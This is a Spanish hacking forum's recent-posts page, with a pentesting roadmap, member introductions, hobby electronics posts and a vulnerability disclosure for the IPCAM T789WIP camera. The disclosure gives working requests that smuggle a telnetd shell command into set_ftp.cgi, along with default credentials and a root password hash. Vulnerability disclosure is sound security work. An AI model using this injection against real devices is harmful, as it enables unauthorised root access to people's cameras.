#RemoteExecution

Mensajes recientes

21
Off-Topic / Re: Panorama de trabajo actual
« Último mensaje por hielasangre en Mayo 24, 2025, 02:27:50 pm »
Buenisimo el aporte bayas! Crees que eso con el tiempo pueda afectar la calidad de los pentest que se realizan?
22
Hacking / GUÍA COMPLETA PARA EMPEZAR EN PENTESTING WEB
« Último mensaje por hielasangre en Mayo 24, 2025, 02:25:16 pm »
Esta guía es una recomendación, esta abierta a modificación y/o recomendaciones para poder hacerla lo más completa posible, con el fin de ayudar a quien quiera dar sus primeros pasos.

[remote] GUÍA COMPLETA PARA EMPEZAR EN PENTESTING WEB
Una ruta extensa y ordenada desde cero hasta nivel avanzado, enfocada exclusivamente en pruebas de penetración web.



[remote] FASE 1: FUNDAMENTOS BÁSICOS

[remote] 1. Fundamentos de Redes
  • Modelo OSI y TCP/IP
  • Protocolos: HTTP/HTTPS, DNS, TCP/UDP, FTP, SSH, SMTP
  • Conceptos clave: IP, MAC, NAT, Subnetting, Routing
  • Herramientas: ping, traceroute, netstat, nslookup, dig, nmap

[remote] Recomendaciones:

[remote] 2. Fundamentos de Sistemas Operativos (Linux)
  • Comandos Bash
  • Estructura del sistema de archivos
  • Permisos, usuarios y grupos
  • Gestión de servicios, logs y paquetes

[remote] Recomendaciones:
  • Distro: Kali Linux o Parrot OS
  • Curso: LPI Linux Essentials
  • Libro: The Linux Command Line – William Shotts

[remote] 3. Fundamentos de Programación
  • Lenguajes: Python, JavaScript, HTML, CSS, SQL
  • Uso de APIs, Web Scraping básico

[remote] Recursos:



[remote] FASE 2: CONCEPTOS DE PENTESTING

[remote] 4. Fundamentos de Ethical Hacking
  • Tipos de Pentest: Caja negra, gris, blanca
  • Fases: Recon, Scanning, Exploiting, Post, Reporte
  • Ética, legalidad y permisos

[remote] Recomendaciones:
  • Certificación: CEH (EC-Council)
  • Libro: The Web Application Hacker's Handbook

[remote] 5. Herramientas Esenciales
Código: [Seleccionar]
- Burp Suite / OWASP ZAP
- Nmap, Nikto, Wfuzz, ffuf
- Gobuster, Sublist3r, Amass
- WhatWeb, Wappalyzer
- sqlmap, Metasploit
- Dirsearch, JSBeautifier



[remote] FASE 3: OWASP TOP 10 (2021)

  • Broken Access Control
  • Cryptographic Failures
  • Injection (SQL, NoSQL, OS, LDAP)
  • Insecure Design
  • Security Misconfiguration
  • Vulnerable and Outdated Components
  • Authentication Failures
  • Software and Data Integrity Failures
  • Logging and Monitoring Failures
  • SSRF (Server-Side Request Forgery)

[remote] Recursos:



[remote]  FASE 4: PRÁCTICA

[remote] Plataformas Online:

[remote] Labs Locales con Docker:
Código: [Seleccionar]
docker pull vulnerables/web-dvwa
docker run -d -p 8080:80 vulnerables/web-dvwa



[remote] FASE 5: AVANZADO

[remote] Temas Avanzados:
  • WebSockets y seguridad
  • JSON Web Tokens (JWT) y ataques
  • SSRF y bypasses modernos
  • Prototype Pollution, DOM-based XSS
  • Cache Poisoning, CSRF avanzado

[remote] Automatización con Python:
  • Librerías: requests, BeautifulSoup, Selenium
  • Automatizar crawling, login brute force, parsing
  • Usar la API de Burp Suite



[remote] FASE 6: REPORTES Y CERTIFICACIONES

  Cómo redactar reportes:
  • Capturas de pantalla
  • Pruebas de concepto (PoC)
  • Recomendaciones de mitigación

[remote] Metodologías de referencia:
  • OWASP Testing Guide
  • PTES – Penetration Testing Execution Standard
  • NIST SP800-115

  [remote] Certificaciones recomendadas:
  • eJPT – INE
  • OSCP – Offensive Security
  • CEH – EC-Council
  • Web Academy Certificate – PortSwigger (Gratis)



[remote] BONUS: HABILIDADES ÚTILES ADICIONALES
  • Expresiones Regulares (Regex)
  • Git y control de versiones
  • Criptografía básica: Hashes, JWT, RSA, AES
  • APIs REST y GraphQL
  • OSINT para reconocimiento pasivo



[remote] LIBROS RECOMENDADOS
  • The Web Application Hacker’s Handbook
  • Hacking: The Art of Exploitation
  • Black Hat Python
  • Bug Bounty Bootcamp – Vickie Li
  • Real-World Bug Hunting – Peter Yaworski



[remote]  RECURSOS
  • Reddit: r/netsec, r/HowToHack
  • Discord: HTB, TryHackMe
  • YouTube: LiveOverflow, STÖK, TheCyberMentor
  • Twitter: @webbreacher, @g0tmi1k, @hakluke



[remote] MAPA DE RUTA RESUMIDO

Código: [Seleccionar]
1. Redes → 2. Linux → 3. Programación
     ↓
4. Fundamentos Hacking → 5. Herramientas
     ↓
6. OWASP Top 10 (a fondo) → 7. Plataformas de práctica
     ↓
8. Temas avanzados → 9. Automatización
     ↓
10. Reportes profesionales → 11. Certificaciones

23
Off-Topic / Presentate aquí
« Último mensaje por hielasangre en Mayo 22, 2025, 11:09:14 pm »
Buenos la intención de este post es que se sientan libre de presentarse si asi lo desean y comentarnos un poco más de ustedes para que nos conozcamos un poco más.

Por mi parte, soy Daniel y por nick llevo hielasangre, actualmente en viviendo en méxico, simpatizante del software libre, el red team, y las bebidas espirituosas, con ganas de volver a la actividad en foros y desarrollar ideas copadas.
24
Off-Topic / Re: Panorama de trabajo actual
« Último mensaje por bayaspirinha en Mayo 22, 2025, 08:25:30 am »
En mi laburo están dejando un poco de lado los pentest tradicionales (sin descartarlos del todo) y están haciendo mucho hincapié en Pentest de IA, algunas puertas se van abriendo para algunos rubros pero parece que son más las que se cierran, si tuviese que adivinar diría que va a afectar más a lo defensivo/blue team   :/
25
Off-Topic / Presentacion:
« Último mensaje por Juano.exe en Mayo 21, 2025, 08:56:42 am »
Hola gente!
¿Como va? Soy Juano o como me conocen por estos lugares, luego de varios nicknames previos, como Juano.exe.

Desde pequeño siempre estuve interesado en la computacion, precisamete en cibersegurdad, puede estudiar mucho de modo autodidacta y luego formarme en sistemas de manera formal, primero como tecnico, despues algun que otra diplomatura y actualmennte me encuentro cursando la Licenciatura en Ciberdefensa.
Si bien en el aspecto laboral siempre estuve involucrado con sistemas informaticos, cuando no lo estaba le buscaba la vuelta para poder vincularme con el area.
Actualmente tengo mas de 15 años de expericia en soporte IT, y en ciberseguridad tengo quizas mas de ese tiempo, pero no de manera formal ya que en mi lugar de residencia no hay muchas posibilidades en el area. Tambien soy docente universitario en una diplomatura en ciberseguridad a nivel nacional.
Por todo esto, siempre trato de estar leyendo, aprendiendo y explicando la importancia de la ciberseguridad.
Si bien, por definicion soy un blue teamer, me interesan todas las ramas de la ciberseguridad.
Queria agradecerle a HielaSangre por levantar la comunidad.
Desde mi lugar, tratare de brindar a todos lo poco o mucho que conozco, buscando crecer entre todos!
Gracias por leer este tan aburrido post!
Saludos!

Juano.exe
 :]
26
Electrónica y Robótica / Re: Cambio de pantalla de GameBoy Color
« Último mensaje por Juano.exe en Mayo 18, 2025, 09:37:54 pm »
Excelente ! Gracias por compartir esta experiencia con nosotros. El sueño de más de uno es una gameboy... Si bien, siempre entre sus juegos y todo eso, una vez un amigo me prestó por unas semanas si gameboy color edición Pikachu con el juego Pokémon amarillo... Fueron de las semanas más felices de mi adolescencia.... Alta de grande una gran amigo mío me regaló una consola retro y paso bastante tiempo jugando con ella!
27
Electrónica y Robótica / Cambio de pantalla de GameBoy Color
« Último mensaje por hielasangre en Mayo 18, 2025, 11:38:20 am »

Seguramente esta consola sea familiar para aquellos que crecimos en los años 90, a pesar que no pude tener una (mis posibilidades estaban más cerca del Family y del 9999 juegos en 1 ) mis padres me compraban muchas revistas de videojuegos, y en esos tiempos había muchos programas dedicadas a consolas.

Hace poco, conversando con mi esposa, hablamos de los juegos que nos gustaban de chicos y ella me comentó, que le gustaba mucho el Tetris; Por esto, dado que a veces tengo oportunidad de asistir a un Tianguis (tipo feria), donde venden muchas cosas dedicadas a los videojuegos, y a los coleccionistas de figuras de diferentes películas, compre un gameboy color en uno de los puestos.

Para mi suerte, encontré un video super explicativo y rápido publicado en Youtube por
RETROVIDEOJUEGOS TV (No me hacía sentido grabar un video mostrando como hacerlo ya que hay un montón de vídeos sobre esto). El enlace es el siguiente:


En el video figura el producto que compró el que realizó el tutorial, y yo compré el mismo, también en aliexpress. El enlace del producto es: https://es.aliexpress.com/item/4000216061721.html?spm=a2g0s.12269583.0.0.17a12f118dccza (Tardó alrededor de 15 días en llegar a mi domicilio)

El cambio de la pantalla se realiza en un máximo de 10 minutos.



En el momento de la compra no me había percatado que para la época en la que fue desarrollado los colores eran todo una novedad… Para jugar en el rayo el sol XD

Pero en estos tiempos que corren, acostumbrados a usar celulares con mejor resolución y demás… El dispositivo se queda un poco corto…

Entonces me puse en el trabajo de ver si existía algún hack o modding que nos permite agregarle una luz o iluminar de alguna forma la pantalla de la consola.





No es muy difícil desarmar la consola, se retiran las pilas y se quitan los tornillos especiales (llamados triwing) y posteriormente se retiran los que fijan la placa a la carcasa (Estos son philips)




Después de desarmarlo todo por completo, pase a retirar muy delicadamente la pantalla, despegar los flex, y probé el controlador nuevo, con la nueva pantalla (que por cierto es un poco más chica que la original).
Conecte, sin terminar de ensamblar todo, para ver si estaba conectada correctamente para conectar el sensor de brillo (con pulsar sobre la carcasa en la parte superior, el brillo disminuye, y hasta se apaga la pantalla).


Ya conforme con cómo había quedado, pasé a armar todo de nuevo… Quedando bastante bien.

Debido a que la carcasa anterior no estaba en muy buenas condiciones, la cambié por una nueva.



Realizar modding a la consola me gustó bastante, así que voy a seguir subiendo artículos relacionados a esto, voy a tratar que sean lo más originales posible (es decir, realizados por mi o por amigos) y no tanto de tutoriales de youtube u otra plataforma.

28
Hacking / Multiples vulnerabilidades en IPCAM T789WIP
« Último mensaje por hielasangre en Mayo 18, 2025, 10:50:45 am »
Descripción del hardware:
La cámara IP inalámbrica (PnP) IPCAM T789WIP es una cámara web china que permite transmitir de forma remota.
Vendor: http://cd.ipcam.so
Versión de firmware: 48.2.64.220
Versión Dispositivo de interfaz de usuario Web Incrustado: TH2.0.1.27



A través de diferentes intentos, lo primero que me ocurrió fue ir buscando diferentes archivos, probando si se podían descargar, ya sea a por medio de una pre autenticación, o sin la misma. Los archivos que intente conseguir son los siguientes:

system.ini
system-b.ini
factory.ini
network.ini

Para esto, utilizamos las credenciales por defecto, usuario: admin y password: 888888

Código: [Seleccionar]
daniel@fuckingmachine % wget -qO- 'http://admin:888888@192.168.1.250:50569/system.ini'|xxd
000006e0: 0004 0404 0404 0100 0005 0000 0000 0000 ................
000006f0: 0100 0000 0000 0000 0000 0000 0000 0000 ................
00000700: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000710: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000720: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000730: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000740: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000750: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000760: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000770: 0000 0000 6164 6d69 6e00 0000 0000 0000 ....admin.......
00000780: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000790: 0000 0000 3838 3838 3838 0000 0000 0000 ....888888......
000007a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000800: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000810: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000820: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000830: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000840: 0000 0000 0000 0000 0000 0000 0000 0000 ................

Pero esto no deja nada por ahora, así que tras seguir investigando, pude dar con un RCE (Remote Command Execution) por medio de la configuración FTP.



La manera de explotarlo será por medio de set_ftp.cgi, configurando los valores utilizando el método GET para esto mismo.
En el primer resquest se setean los valores a aprovechar, y en el segundo se ejecutan, haciendo uso de ftptest.cgi para poner en funcionamiento la configuración seteada anteriormente.

Código: [Seleccionar]
daniel@fuckingmachine % wget -qO- 'http://192.168.1.250:50569/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=888888&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'

daniel@fuckingmachine % wget -qO- 'http://192.168.1.250:50569/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=888888'


Una vez ejecutado, podemos usar el binario telnetd para iniciar un acceso telnetd sin autenticación de la siguiente manera:

Código: [Seleccionar]
telnet 192.168.1.250 25
Trying 192.168.1.250...
Connected to pc192.168.1.250.
Escape character is '^]'.


BusyBox v1.12.1 (2013-07-23 17:19:11 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Y así es como podemos empezar a teclear comandos, por ejemplo ver /etc/passwd lo que revela que existe una cuenta de puerta trasera en la cámara: (Backdoor)

Código: [Seleccionar]
# cat /etc/passwd
root:OYZVRABjiXqqQ:0:0:Administrator:/:/bin/sh#

Por tanto se puede dejar en limpio que la cámara posee múltiples vulnerabilidades:

* Credenciales por defecto (admin:888888)
* Usuario de puerta trasera (root:OYZVRABjiXqqQ:0:0:Administrator:/:/bin/sh#)
* RCE sin autenticación a través de la configuración FTP
29
Arduino / Arduino Uno - Guía rápida
« Último mensaje por hielasangre en Mayo 18, 2025, 06:44:26 am »
Les comparto una guía rápida de Arduino UNO, bastante útil para tener a mano y evacuar dudas, o refrescar conocimientos.




30
Off-Topic / Re: Panorama de trabajo actual
« Último mensaje por Juano.exe en Mayo 17, 2025, 07:00:41 pm »
Yo tengo laburo mixto, trabajo en ciberseguridad siendo profesor en Universidad y trabajo como administrativo en organización gubernamental (soporte técnico informatico).
Y en estas dos trabajos tengo el soporte la inteligencia artificial O sea que puedo mejorar mi performance haciendo consultas, buscando e indagando acceso a guías, me da ejemplos y muchas cosas que antes demoraba mucho. Es un gran herramienta, que da mucho soporte pero como vos bien decís la implementación de soluciones basada en inteligencia artificial van a dificultar el acceso al mercado para personas que están intentando entrar como primer laburo.